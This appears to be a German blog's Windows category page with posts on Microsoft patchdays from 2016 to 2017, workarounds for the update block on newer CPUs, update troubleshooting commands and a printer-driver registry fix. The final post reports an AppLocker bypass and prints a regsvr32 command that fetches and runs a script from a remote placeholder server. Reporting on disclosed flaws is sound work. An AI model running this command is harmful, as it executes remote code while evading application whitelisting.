Kategorie: Windows 8

Infos zum Microsoft-Patchday Juni 2017

Microsoft Logo

Gestern (zweiter Dienstag im Monat) läutete Microsoft den Patchday für Juni 2017 ein. Wie immer behebt Microsoft viele kritische Sicherheitslücken. Die am Ende des Artikels aufgeführte Tabelle gibt einen kurzen Überblick.

Beginnend mit April 2017 hat Microsoft die bisher verwendeten Sicherheitsbulletin-Webseiten durch den Leitfaden für Sicherheitsupdates ersetzt. Das neue Portal soll durch die vielfältigen Such- und Filterfunktionen einen besseren Überblick über neue Updates bieten.

Für jede Windows 10 Version veröffentlicht Microsoft ein eigenes kumulatives Update, welche die entsprechenden Windows 10 Versionen auf neue Build-Nummern hebt:

  • Windows 10 Version 1703 Build 15063.413
  • Windows 10 Version 1607 Build 14393.1358
  • Windows 10 Version 1511 Build 10586.962
  • Windows 10 Version 1507 (RTM) Build 10240.17443
ProduktfamilieMaximaler Schweregrad
Maximale Auswirkung
Neustart erforderlich?Zugehörige KB-Artikel und/oder Supportwebseiten
Windows 10 und Windows Server 2016 (einschließlich Microsoft Edge)Kritisch
Remotecodeausführung
Requires restartWindows 10 RTM: 4022727; Windows 10 1511: 4022714; Windows 10 1607: 4022715; Windows 10 1703: 4022725; Windows Server 2016: 4022715.
Windows 8.1 und Windows Server 2012 R2Kritisch
Remotecodeausführung
Requires restartWindows 8.1 und Windows Server 2012 R2: 4022717 (reines Sicherheitsupdate) und 4022726 (monatlicher Rollup).
Windows Server 2012Kritisch
Remotecodeausführung
Requires restartWindows Server 2012: 4022718 (reines Sicherheitsupdate) und 4022724 (monatlicher Rollup).
Windows RT 8.1Kritisch
Remotecodeausführung
Requires restartWindows RT 8.1: 4022726. Hinweis: Updates für Windows RT 8.1 sind nur über Windows Update verfügbar.
Windows 7 und Windows Server 2008 R2Kritisch
Remotecodeausführung
Requires restartWindows 7 und Windows Server 2008 R2: 4022722 (reines Sicherheitsupdate) und 4022719 (monatlicher Rollup).
Windows Server 2008Kritisch
Remotecodeausführung
Requires restartUpdates für Windows Server 2008 werden nicht in Form eines kumulativen Updates oder Rollups angeboten. Die folgenden Artikel beziehen sich auf eine Version von Windows Server 2008: 3217845, 4018106, 4019204, 4021903, 4021923, 4022008, 4022010, 4022013, 4022883, 4022884, 4022887 und 4024402.
Internet ExplorerKritisch
Remotecodeausführung
Requires restartInternet Explorer 9: 4021558; Internet Explorer 10: 4022724 und 4021558; Internet Explorer 11: 4021558, 4022714, 4022715, 4022719 , 4022725, 4022726 und 4022727.
Microsoft Office, Office-Dienste, Office Web Apps und sonstige Software im Zusammenhang mit OfficeKritisch
Remotecodeausführung
May require restartDiese Veröffentlichung besteht aus 42 KB-Artikeln für Office-Komponenten, die hier nicht alle aufgelistet werden können. Links zu diesen Artikeln finden Sie im Leitfaden für Sicherheitsupdates oder besuchen Sie die Office TechCenter-Angebotsseite für Office-Downloads und -Updates.
Microsoft SilverlightKritisch
Remotecodeausführung
May require restartMicrosoft Silverlight: 4023307.
Microsoft Lync und Skype for BusinesKritisch
Remotecodeausführung
May require restartMicrosoft Lync: 3191939; Skype for Business: 3203382
Adobe Flash PlayerKritisch
Remotecodeausführung
Requires restartInformationen von Microsoft zu Sicherheitsupdates für Adobe Flash Player: 4022730.

Infos zum Microsoft-Patchday Mai 2017

Microsoft Logo

Heute (zweiter Dienstag im Monat) ist der Microsoft-Patchday für den Mai 2017. Wieder einmal behebt Microsoft viele kritische Sicherheitslücken. Die am Ende des Artikels aufgeführte Tabelle gibt einen kurzen Überblick. Nach dem April 2017 ist das der zweite Patchday, an dem Microsoft die bisher verwendeten Sicherheitsbulletin-Webseiten durch den Leitfaden für Sicherheitsupdates ersetzt. Das neue Portal soll durch die vielfältigen Such- und Filterfunktionen einen besseren Überblick über neue Updates liefern.

Für jede Windows 10 Version veröffentlicht Microsoft ein eigenes kumulatives Update, welche die entsprechenden Windows 10 Versionen auf neue Build-Nummern hebt:

  • Windows 10 Version 1703 Build 15063.296
  • Windows 10 Version 1607 Build 14393.1198
  • Windows 10 Version 1511 Build 10586.916
  • Windows 10 Version 1507 (RTM) Build 10240.17394
ProduktfamilieMaximaler Schweregrad
Maximale Auswirkung
Neustart erforderlich?Zugehörige KB-Artikel und/oder Supportwebseiten
Windows 10 und Windows Server 2016 (einschließlich Microsoft Edge)Kritisch
Remotecodeausführung
Requires restartWindows 10 RTM: 4019474; Windows 10 1511: 4019473; Windows 10 1607: 4019472; Windows 10 1703: 4016871; Windows Server 2016: 4019472.
Windows 8.1 und Windows Server 2012 R2Kritisch
Remotecodeausführung
Requires restartWindows 8.1 und Windows Server 2012 R2: 4019213 (reines Sichheitsupdate) und 4019215 (monatlicher Rollup).
Windows Server 2012Kritisch
Remotecodeausführung
Requires restartWindows Server 2012: 4019216 (reines Sichheitsupdate) und 4019214 (monatlicher Rollup).
Windows RT 8.1Kritisch
Remotecodeausführung
Requires restartWindows RT 8.1: 4019215. Hinweis: Updates für Windows RT 8.1 sind nur über Windows Update verfügbar.
Windows 7 und Windows Server 2008 R2Kritisch
Remotecodeausführung
Requires restartWindows 7 und Windows Server 2008 R2: 4019263 (reines Sichheitsupdate) und 4019264 (monatlicher Rollup).
Windows Server 2008Kritisch
Remotecodeausführung
Requires restartUpdates für Windows Server 2008 werden nicht in Form eines kumulativen Updates oder Rollups angeboten. Die folgenden Artikel beziehen sich auf eine Version von Windows Server 2008: 4019149, 4018196, 4018885, 4019206, 4018556, 4018821, 4018927, 4019204 und 4018466.
Internet ExplorerKritisch
Remotecodeausführung
Requires restartInternet Explorer 9: 4018271; Internet Explorer 10: 4018271 und 4019214; Internet Explorer 11: 4016871, 4018271, 4019215, 4019264, 4019472, 4019473 und 4019474.
Microsoft Office, Office-Dienste, Office Web Apps und sonstige Software im Zusammenhang mit OfficeHoch
Remotecodeausführung
May require restartDiese Veröffentlichung besteht aus 31 KB-Artikeln für Office-Komponenten, die hier nicht alle aufgelistet werden können. Links zu diesen Artikeln finden Sie im Leitfaden für Sicherheitsupdates oder besuchen Sie die Office TechCenter-Angebotsseite für Office-Downloads und -Updates
.NET FrameworkHoch
Umgehung von Sicherheitsfunktionen
May require restartDiese Veröffentlichung besteht aus 12 KB-Artikeln zu den verschiedenen Versionen von .NET Framework, die hier nicht alle aufgelistet werden können. Links zu diesen Artikeln finden Sie im Leitfaden für Sicherheitsupdates.
Adobe Flash PlayerKritisch
Remotecodeausführung
Requires restartInformationen von Microsoft zu Sicherheitsupdates für Adobe Flash Player: 4020821.

Windows 7 und 8.1: Update-Sperre für neuere Prozessoren umgehen

Microsoft Logo

Microsoft hat Ernst gemacht und schließt mit dem April-Patchday fortan Windows 7 und 8.1 beim Einsatz neuerer Prozessoren von sämtlichen Updates aus. Weitere Infos dazu gibts in meinem Artikel „Windows 7 und 8.1: Microsoft sperrt Updates für neuere Prozessoren„.

In diesem Artikel möchte ich keine Diskussion über dieses Vorgehen starten, sondern mögliche Workarounds vorstellen. Eines gleich vorweg: Keine der potenziellen Alternativen fällt wirklich befriedigend aus.

Wechsel zu Windows 10

Diese Möglichkeit dürfte auf der Hand liegen. Microsoft selbst schlägt sie im KB-Artikel 4012982 vor. Allerdings dürfte sie den wenigsten Nutzern von Windows 7 und 8.1 gefallen. Wer offen gegenüber Windows 10 ist hat sicherlich schon längst gewechselt und die verbliebenen Nutzer dürften wenig begeistert sein. Für Firmenkunden ist es aber die einzig sinnvolle und natürlich auch von Microsoft begrüßte Variante.

Entsprechende Updates deinstallieren

Die Änderung wird unter Windows 7 mit dem Update KB4015549 und unter Windows 8.1. mit dem Update KB4015550 ausgerollt. Diese Updates müssten vor jedem Patchday entfernt werden, sodass der Updatemechanismus wieder funktioniert und Windows jeden Monat die neuesten Updates automatisch installiert. Da die „bösartigen“ Updates aber auch wieder nachinstalliert werden, müsste dieser Vorgang jeden Monat kurz nach dem Patchday wiederholt werden. Auf Dauer natürlich keine gangbare Lösung und wenn Microsoft reagiert in Zukunft eventuell auch gar nicht mehr möglich.

Updates manuell installieren

Alle Updates ab Mai 2017 könnten manuell mit Hilfe sogenannter Update Packs nachinstalliert werden. Allerdings ist aktuell nicht klar, ob das überhaupt funktioniert. Selbst wenn hat diese Variante zwei gravierende Nachteile: Erstens muss dies jeden Monat von Hand erfolgen und zweitens sind oft nicht alle Updates in den Update Packs enthalten.

Workaround über ältere Windows-Dateien

Die derzeit wohl eleganteste Methode ist der Workaround über Windows-Dateien vor dem April-Patchday. Folgende sechs Dateien werden benötigt:

  • wu.upgrade.ps.dll
  • wuapi.dll
  • wuapp.exe
  • wuauclt.exe
  • wuaueng.dll
  • wucltux.dll

Alle Dateien liegen unter „C:\Windows\System32\“. Diese Dateien werden durch den April-Patchday durch neue Versionen ausgetauscht. Wenn ihr diese anschließend wieder durch die alten Versionen ersetzt, funktioniert die Suche und Installation neuer Updates wieder!

Zum Ersetzen der Dateien muss der Windows Update Dienst beendet werden und die Rechte der Dateien müssen übernommen werden. Wer das nicht hinbekommt, sollte den Umweg über ein Live-Linux gehen. Geht schnell und einfach.

Abschließend noch zwei Foren-Threads mit Erfolgsmeldungen dieser Methode:

https://www.askwoody.com/forums/topic/for-you-testers-heres-how-to-spoof-a-kaby-lake-processor-inside-a-virtualbox-win7-vm/#post-108424
https://www.computerbase.de/forum/showthread.php?t=1667813&page=27&p=19984852#post19984852

Windows 7 und 8.1: Microsoft sperrt Updates für neuere Prozessoren

Was sich bereits letzten Monat angedeutet hat ist nun Tatsache: Beim Einsatz von neueren Prozessoren liefert Microsoft zukünftig unter Windows 7 und 8.1 keine Updates mehr aus. Auch die korrespondierenden Server-Betriebssysteme sind davon betroffen. Bei den Prozessoren handelt es sich konkret um Intels Kaby Lake und AMDs Ryzen.

Die entsprechende Funktionalität hatte Microsoft bereits im März in die optionale Vorschau auf den April-Patchday eingebaut (Windows 7: KB4012218; Windows 8.1: KB4012219). Mit dem aktuellen April-Patchday wurde die Funktionalität nun offiziell ausgerollt. Der Code zum Blockieren von Windows-Updates beim Einsatz von neueren Prozessoren versteckt sich in den Updates KB4015549 (Windows 7) und KB4015550 (Windows 8.1). Alle Updates für April werden also noch installiert, erst danach wird jeder weitere Update-Versuch mit einer Fehlermeldung quittiert:

Windows 7/8.1: Fehlermeldung "Hardware nicht unterstützt"

Windows 7/8.1: Fehlermeldung „Hardware nicht unterstützt“ nach dem Patchday April 2017

Darüber hinaus kann es auch zum Fehlercode 0x80240037 kommen:

Fehlercode 0x80240037Microsoft selbst weist im KB-Artikel 4012982 auf dieses Verhalten hin: Fehlermeldung „Ihr PC verwendet einen unter dieser Windows-Version nicht unterstützten Prozessor“ beim Suchen oder Herunterladen von Windows-Updates. Auch im „Informationsblatt zum Lebenszyklus von Windows“ hat der Softwareriese eine neue Passage hinzugefügt:

In früheren Versionen von Windows, einschließlich Windows 7 und Windows 8.1, ist die Unterstützung für neue Prozessoren und Chipsätze von Herstellern wie Intel, AMD, NVidia und Qualcomm eingeschränkt.

Offensichtlich möchte Microsoft mit dieser Zwangsmaßnahme mehr Kunden zu Windows 10 bewegen. Zumindest von der technischen Seite lässt sich das Blocken von zukünftigen Windows-Updates auf neueren Prozessoren nicht begründen. Vielmehr könnte man sogar so weit gehen und Microsoft Vertragsbruch vorwerfen, denn bisher hat der Hersteller Sicherheits-Updates bis zum Auslaufen des Supports versprochen. Der Mainstream-Support für Windows 8.1 endet am 9. Januar 2018 und der Extended- Support sogar erst am 10. Januar 2023. Bei Windows 7 läuft der erweiterte Support bis 14. Januar 2020. Ganz so einfach dürfte die Sache aber nicht sein und vielleicht gibt es bald ein paar mutige Nutzer, die sich zu einer Sammelklage gegen Microsoft zusammenfinden.

Infos zum Microsoft-Patchday April 2017

Microsoft Logo

Am heutigen Dienstag (zweiter Dienstag im Monat) startet der Microsoft-Patchday für den April 2017. Neben dem offiziellen Start für das Creators Update für Windows 10 (Version 1703), hat Microsoft außerdem eine Menge Updates freigegeben.

Für jede Windows 10 Version veröffentlicht Microsoft ein eigenes kumulatives Update, welche die entsprechenden Windows 10 Versionen auf neue Build-Nummern hebt:

  • Windows 10 Version 1703 Build 15063.138
  • Windows 10 Version 1607 Build 14393.1066
  • Windows 10 Version 1511 Build 10586.873
  • Windows 10 Version 1507 (RTM) Build 10240.17354

Darüber hinaus ersetzt Microsoft nun offiziell die bisher verwendeten Sicherheitsbulletin-Webseiten durch den Leitfaden für Sicherheitsupdates. Dieses Vorhaben hat der Softwareriese bereits im November 2016 angekündigt. Das neue Portal soll Kunden einen besseren Überblick über neue Updates liefern, was vor allem durch die vielfältigen Such- und Filterfunktionen gewährleistet werden soll. So kann beispielsweise nach Datum, Produkt, Schweregrad, Auswirkung, KB- oder CVE-Nummer gesucht werden.

Nachfolgend ein kurzer Überblick über die neuen Updates für April 2017:

ProduktfamilieMaximaler Schweregrad
Maximale Auswirkung
Neustart erforderlich?Zugehörige KB-Artikel und/oder Supportwebseiten
Windows 10 und Windows Server 2016 (einschließlich Microsoft Edge)Kritisch
Remotecodeausführung
Requires restartWindows 10 RTM: KB4015221; Windows 10 1511: KB4015219; Windows 10 1607: KB4015217; Windows 10 1703: KB4015583; Windows Server 2016: KB4015217.
Windows 8.1 und Windows Server 2012 R2Kritisch
Remotecodeausführung
Requires restartWindows 8.1 und Windows Server 2012 R2: KB4015550 und KB4015547.
Windows Server 2012Kritisch
Remotecodeausführung
Requires restart

Windows Server 2012: KB4015551 und KB4015548.

Windows RT 8.1Kritisch
Remotecodeausführung
Requires restart

Windows RT 8.1: KB4015550. Hinweis: Updates für Windows RT 8.1 sind nur über Windows Update verfügbar.

Windows 7 und Windows Server 2008 R2Kritisch
Remotecodeausführung
Requires restartWindows 7 und Windows Server 2008 R2: KB4015549 und KB4015546.
Windows Vista und Windows Server 2008Kritisch
Remotecodeausführung
Requires restartUpdates für Windows Vista und Windows Server 2008 werden nicht in Form eines kumulativen Updates oder Rollups angeboten. Die folgenden Artikel beziehen sich auf eines der beiden Betriebssysteme: KB3211308, KB3217841, KB4014793, KB4015067, KB4015068, KB4015195, KB4015380 und KB4015383.
Internet ExplorerKritisch
Remotecodeausführung
Requires restartInternet Explorer 9: KB4014661; Internet Explorer 10: KB4015551; Internet Explorer 11: KB4015217, KB4015219, KB4015221, KB4015550 und KB4015583.
Microsoft SilverlightHoch
Offenlegung von Informationen
Requires restartMicrosoft Silverlight: KB4017094. Weitere Informationen: https://www.microsoft.com/silverlight
.NET FrameworkKritisch
Remotecodeausführung
May require restartDiese Veröffentlichung besteht aus 12 KB-Artikeln zu den verschiedenen Versionen von .NET Framework, die hier nicht alle aufgelistet werden können. Links zu diesen Artikeln finden Sie im Leitfaden für Sicherheitsupdates.
Microsoft Office, Office-Dienste, Office Web Apps und sonstige Software im Zusammenhang mit OfficeKritisch
Remotecodeausführung
Requires restart

Diese Veröffentlichung besteht aus 20 KB-Artikeln für Office-Komponenten, die hier nicht alle aufgelistet werden können. Links zu diesen Artikeln finden Sie im Leitfaden für Sicherheitsupdates.

Adobe Flash PlayerKritisch
Remotecodeausführung
Requires restartInformationen von Microsoft zu Sicherheitsupdates für Adobe Flash Player: KB4018483.
Visual Studio für MacHoch
Offenlegung von Informationen
Requires restartRessourcenwebseite für Visual Studio für Mac: https://www.visualstudio.com/de/vs/visual-studio-mac/

Infos zum Microsoft-Patchday März 2017

Microsoft Logo

Nachdem der Februar-Patchday aus noch immer ungeklärten Gründen komplett ausgefallen ist, erscheinen an diesem März-Patchday mehr Updates als üblich. Insgesamt veröffentlicht Microsoft 18 Security-Bulletins, von denen neun als „kritisch“ und neun als „hoch“ eingestuft werden.

Es ist immer noch unklar, warum der letzte Patchday ausgefallen ist. Es kursieren zwar einige Gerüchte, aber keines konnte bisher bestätigt werden. Microsoft erklärte lediglich, dass in letzter Minute ein Problem gefunden wurde und nicht rechtzeitig gelöst werden konnte. Der Microsoft-Patchday existiert mittlerweile seit über 13 Jahren und ein vergleichbarer Fall ist bisher nie aufgetreten.

Nachfolgend ein kurzer Überblick über die erscheinenden Bulletins und die betroffenen Produkte. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Bulletin ID Bulletin TitleMaximum Severity Rating and Vulnerability ImpactRestart RequirementAffected Software
MS17-006Kumulatives Sicherheitsupdate für Internet Explorer (4013073)Critical
Remote Code Execution
Requires restartInternet Explorer 10, Internet Explorer 11 und Microsoft Edge auf betroffenen Windows-Clients und-Servern.
MS17-007Kumulatives Sicherheitsupdate für Microsoft Edge (4013071)Critical
Remote Code Execution
Requires restartMicrosoft Edge
MS17-008Sicherheitsupdate für Windows Hyper-V (4013082)Critical
Remote Code Execution
Requires restartWindows Vista, Windows 7, Windows 8.1, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows 10 und Windows Server 2016.
MS17-009Sicherheitsupdate für Microsoft Windows-PDF-Bibliothek (4010319)Critical
Remote Code Execution
Requires restart
MS17-010Sicherheitsupdate für Microsoft Windows SMB-Server (4013389)Critical
Remote Code Execution
Requires restartWindows Vista, Windows 7, Windows 8.1, Windows RT 8.1, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows 10 und Windows Server 2016.
MS17-011Sicherheitsupdate für Microsoft Uniscribe (4013076)Critical
Remote Code Execution
Requires restartWindows Vista, Windows 7, Windows 8.1, Windows RT 8.1, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows 10 und Windows Server 2016.
MS17-012Sicherheitsupdate für Microsoft Windows (4013078)Critical
Remote Code Execution
Requires restartWindows 8.1, Windows RT 8.1, Windows Server 2012 R2, Windows 10 und Windows Server 2016.
MS17-013Sicherheitsupdate für Microsoft-Grafikkomponente (4013075)Critical
Remote Code Execution
Requires restartWindows Vista, Windows 7, Windows 8.1, Windows RT 8.1, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows 10 und Windows Server 2016, Lync 2010, Lync 2013, Skype for Business 2016, Office 2007, Office 2010, Word Viewer und Silverlight 5.
MS17-014Sicherheitsupdate für Microsoft Office (4013241)High
Remote Code Execution
May require restartMicrosoft SharePoint Foundation 2013
MS17-015Sicherheitsupdate für Microsoft Exchange Server (4013242)High
Remote Code Execution
Requires restartExchange Server 2013 – Kumulatives Update 14, Exchange Server 2013 SP1 und Exchange Server 2016 – Kumulatives Update 3.
MS17-016Sicherheitsupdate für Windows IIS (4013074)High
Remote Code Execution
Requires restartWindows Vista, Windows 7, Windows 8.1, Windows RT 8.1, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2, Windows 10 und Windows Server 2016.
MS17-017Sicherheitsupdate für Windows Kernel (4013081)High
Elevation of Privilege
Requires restart
MS17-018Sicherheitsupdate für Windows-Kernelmodustreiber (4013083)High
Elevation of Privilege
Requires restart
MS17-019Sicherheitsupdate für Active Directory-Verbunddienste (4010320)High
Information Disclosure
Requires restart
MS17-020Sicherheitsupdate für Windows DVD Maker (3208223)High
Information Disclosure
Requires restart
MS17-021Sicherheitsupdate für Windows DirectShow (4010318)High
Information Disclosure
Requires restart
MS17-022Sicherheitsupdate für Microsoft XML Core Services (4010321)High
Information Disclosure
Requires restart
MS17-023Sicherheitsupdate für Adobe Flash Player (4014329)Critical
Remote Code Execution
Requires restart

Windows 8.1: Update dauert ewig oder findet nichts

Windows 8 Logo

Vor wenigen Tagen habe ich meinen Artikel „Windows 7: Update dauert ewig oder findet nichts“ veröffentlicht, in dem ich das Problem der langsamen Update-Suche unter Windows 7 erkläre und eine Lösung aufzeige. Offensichtlich tritt das Problem auch unter Windows 8.1 auf, allerdings nicht so häufig. Könnte aber auch damit zusammenhängen, dass Windows 8.1 einen deutlich geringeren Marktanteil aufweist und man deshalb einfach weniger darüber liest und hört.

Das Problem ist identisch wie unter Windows 7. Die Suche nach Windows Updates dauert ewig und die Meldung „Es wird nach Updates gesucht…“ erscheint und möchte nicht mehr verschwinden. Dazu ist oftmals eine hohe CPU-Last auf einem Kern feststellbar. Wer an ein paar Infos an der Ursache interessiert ist, kann in meinem Artikel zu Windows 7 nachlesen.

Windows 8.1 Update Suche

Nachdem mich ein Leser für Hilfe bei Windows 8.1 gefragt hat, hier die Schritte zur Problembehebung.

Lösung

Auch für Windows 8.1 bietet Microsoft ein Update an, welches das Problem durch eine neue Version für Windows Update beheben soll.

  1. Als Voraussetzung für die Installation dieses Updates muss zuerst ein Update des Servicing Stacks (KB3021910) installiert werden.
  2. Vor der Installation muss der „Windows Update“ Dienst beendet werden. Dies macht ihr am besten direkt über „Dienste“ oder alternativ über die Eingabeaufforderung und den Befehl „net stop wuauserv“.
  3. Jetzt könnt ihr das „April 2015 servicing stack update“ KB3021910 herunterladen. Alternativ wäre auch das „July 2016 servicing stack update“ KB3173424 möglich.
  4. Update installieren und PC anschließend neu starten.
  5. Jetzt folgt das oben erwähnte „Update für Windows Update“, welches Teil des „July 2016 update rollup“ KB3172614 ist. Der Download ist direkt im Windows-Update-Katalog möglich.
  6. Zur Installation muss der „Windows Update“ Dienst ein weiteres Mal beendet werden.
  7. Update installieren und PC anschließend neu starten.
  8. Jetzt könnt ihr manuell nach Updates suchen und nach einigen Minuten solltet ihr alle verfügbaren Updates für euer System sehen.

Falls immer noch keine Updates gefunden werden könnt ihr noch folgende Dinge ausprobieren:

  • Komponentenspeichers reparieren
    Eine administrativen Eingabeaufforderung starten und folgende Befehle nacheinander eingeben:

    sfc /scannow
    Dism /Online /Cleanup-Image /ScanHealth
    Dism /Online /Cleanup-Image /CheckHealth
    Dism /Online /Cleanup-Image /RestoreHealth

    Anschließend den PC neustarten.

  • Windows Update Einstellungen zurücksetzen
    Windows Update in der Systemsteuerung öffnen und links auf „Einstellungen ändern“ klicken. Im Dropdown-Menü wählt ihr dann „Nie nach Updates suchen (nicht empfohlen)“ aus und klickt auf OK. Anschließend öffnet ihr die Einstellungen erneut und stellt zurück auf „Updates automatisch installieren (empfohlen)“ und klickt auf OK.

Spätestens jetzt sollten die Updates wieder schneller gefunden werden.

Lösung: Windows ignoriert Gruppenrichtlinieneinstellung Point-and-Print-Einschränkungen

In größeren Firmennetzwerken mit vielen Clients wird oftmals von der Gruppenrichtlinieneinstellung Point-and-Print-Einschränkungen (Point and Print Restrictions) Gebrauch gemacht, um den Administrationsaufwand gering zu halten. Mit dieser Einstellung lässt sich steuern, wie Benutzer Druckertreiber von Druckerservern installieren können.

Seit einigen Wochen kommt es allerdings teilweise zu Problemen. Einige User berichten von einer Sicherheitsmeldung, wenn sie bestimmte Drucker verknüpfen bzw. installieren wollen. Die Meldung lautet „Vertrauen Sie diesem Drucker?“.

Vertrauen Sie diesem Drucker?

Ursache des Problems ist das Security-Bulletin MS16-087 aus dem Juli-Patchday. Genauer gesagt KB3170455 unter Windows 7 bzw. 8.1 und KB3163912 unter Windows 10 bzw. KB3172985 bei Windows 10 v1511. Nach der Deinstallation des entsprechenden Updates ist das Problem verschwunden und die Benutzer können ohne Warnmeldung Drucker installieren. Allerdings ist dieser Workaround nicht empfehlenswert und in vielen Netzwerken auch gar nicht möglich.

Auf der Suche nach einer sinnvollen Lösung bin ich auf den Thread „KB3163912 breaks Point and Print Restrictions GPO settings“ im TechNet gestoßen. Hier berichten viele User von ähnlichen Problemen. Nach weiterer Fehlersuche war schnell klar, dass dieses Problem lediglich bei Druckern auftritt, die keine „packaged“-Treiber verwenden.

Einige haben sogar einen Case via Microsoft-Premiumsupport eröffnet. Die offizielle Antwort von Microsoft lautet, den Druckerhersteller zu kontaktieren und „packaged“ Treiber zu verwenden. Leider existiert in einigen Fällen aber kein „packaged“-Treiber, was vor allem (aber nicht ausschließlich) ältere Drucker betrifft.

Lösung

Schlussendlich hat ein findiger User doch noch eine brauchbare Lösungsmöglichkeit vorgeschlagen. Mit Hilfe der Registry lässt sich ein „un-packaged“-Treiber in einen „packaged“-Treiber verwandeln. Dazu öffnet man den Registrierungseditor und navigiert zu folgendem Pfad:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Enviroments\Windowsx64\Drivers\...\

Dort angekommen wählt man links den betroffenen Druckertreiber aus, in meinem Beispiel den „Brother PCL5e Driver“.

Rechts muss der Wert „PrinterDriverAttributes“ angepasst werden. Das niedrigste Bit des Wertes ist für die Eigenschaft „Package Aware“ zuständig und muss entsprechend auf „1“ gesetzt werden. Der vorhandene Wert muss dabei ungerade gemacht werden, d.h. ein Wert von „0“ wird auf „1“ gesetzt, ein Wert von „2“ auf „3“ usw. Wenn der Wert beispielsweise „5“ ist dann passt er bereits und es muss nichts geändert werden. Danach muss noch der Druckdienst (Spooler, deutsch: Druckerwarteschlange) neugestartet werden. Ab diesem Zeitpunkt meldet sich der Treiber als „packaged“ und kann ohne weiteren Benutzereingriff installiert werden.

Alternativ kann der betroffene Druckertreiber auch von Hand in einen „packaged“-Treiber umgewandelt werden. Hierzu reicht eine kleine Anpassung der INF-Datei aus. Bei Microsoft existieren weitere Informationen dazu. Vielleicht bekommen es damit auch einige Druckerhersteller gebacken, endlich „packaged“-Treber anzubieten.

Ab Oktober 2016 nur noch kumulative Updates für Windows 7 und 8.1

Microsoft Logo

Microsoft hat bekannt gegeben, dass es für Windows 7 und 8.1 zukünftig keine einzelnen Updates mehr, sondern nur noch kumulative Rollup-Pakete geben wird. Die Änderung soll ab Oktober 2016 Einzug halten und betrifft auch Windows Server 2008 R2, 2012 und 2012 R2.

Die kumulativen Rollup-Pakete werden ab Oktober eingeführt und werden ab diesem Zeitpunkt dann auch jeweils die Korrekturen der Vormonate enthalten. Längerfristig möchte Microsoft aber nach und nach auch alle bisher erschienenen Updates in die kumulativen Pakete integrieren. Für das .NET-Framework, Flash und den Internet Explorer sollen jeweils eigene Rollup-Pakete erscheinen. Durch den Einsatz von sogenannten „Express Packages“ möchte Microsoft das Downloadvolumen für die Pakete klein halten. Dabei lädt der Windows-Client nur die tatsächlich benötigten Teile eines Update-Pakets herunter.

Neben den Rollup-Paketen, welche sowohl sicherheits- und nicht-sicherheitskritische Updates enthalten, wird Microsoft für Firmenkunden auch monatliche Sicherheits-Sammelpatches anbieten. Diese sind nicht kumulativ und enthalten alle Sicherheits-Updates für den jeweiligen Monat.

Durch diese Änderung möchte Microsoft die starke Fragmentierung von Windows 7 und 8.1 eindämmen und bestenfalls komplett beenden. Gleichzeitig möchte der Softwareriese damit die Anzahl der unterschiedlichen Systemkonfigurationen und potenziellen Fehlerquellen verringern. Ein Vorteil dabei ist, dass ein frisch installiertes Windows 7 oder 8.1 im besten Fall nur wenige Pakete installieren muss, um den aktuellen Patch-Stand zu erreichen. Allerdings bietet das Vorgehen von Microsoft auch einige Nachteile. Beispielsweise können problematische Patches dann nicht mehr wie bisher einzeln deinstalliert werden. Außerdem könnte Microsoft damit noch einfacher unerfreuliche funktionelle Änderungen verbreiten, Stichwort Telemetrie-Updates oder das GWX-Tool.

Microsoft-Patchday August 2016

Microsoft Logo

Am heutigen Patchday veröffentlicht Microsoft neun Security-Bulletins, von denen fünf als „kritisch“ und vier als „hoch“ eingestuft werden. Insgesamt sollen 34 Sicherheitslücken durch die Updates behoben werden. Neben den obligatorischen Updates für den Internet Explorer und Edge-Browser, stehen auch Updates für Office und Skype for Business bereit.

Nachfolgend ein grober Überblick der zur Verfügung stehenden sicherheitsrelevanten Updates. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Bulletin ID Bulletin TitleMaximum Severity Rating and Vulnerability ImpactRestart RequirementAffected Software
MS16-095 Cumulative Security Update for Internet Explorer (3177356)Critical
Remote Code Execution
Requires restart
MS16-096 Cumulative Security Update for Microsoft Edge (3177358)Critical
Remote Code Execution
Requires restart
MS16-097 Security Update for Microsoft Graphics Component (3177393)Critical
Remote Code Execution
May require restart
MS16-098 Security Update for Windows Kernel-Mode Drivers (3178466)Important
Elevation of Privilege
Requires restart
MS16-099Security Update for Microsoft Office (3177451)Critical
Remote Code Execution
May require restart
MS16-100Security Update for Secure Boot (3179577)Important
Security Feature Bypass
Does not require restart
MS16-101Security Update for Windows Authentication Methods (3178465)Important
Elevation of Privilege
MS16-102Security Update for Microsoft Windows PDF Library (3182248)Critical
Remote Code Execution
May require restart
MS16-103Security Update for ActiveSyncProvider (3182332)Important
Information Disclosure
Requires restart

Windows-Schwachstelle erlaubt Umgehung von AppLocker

Microsoft Logo

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms „Regsvr32“ (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

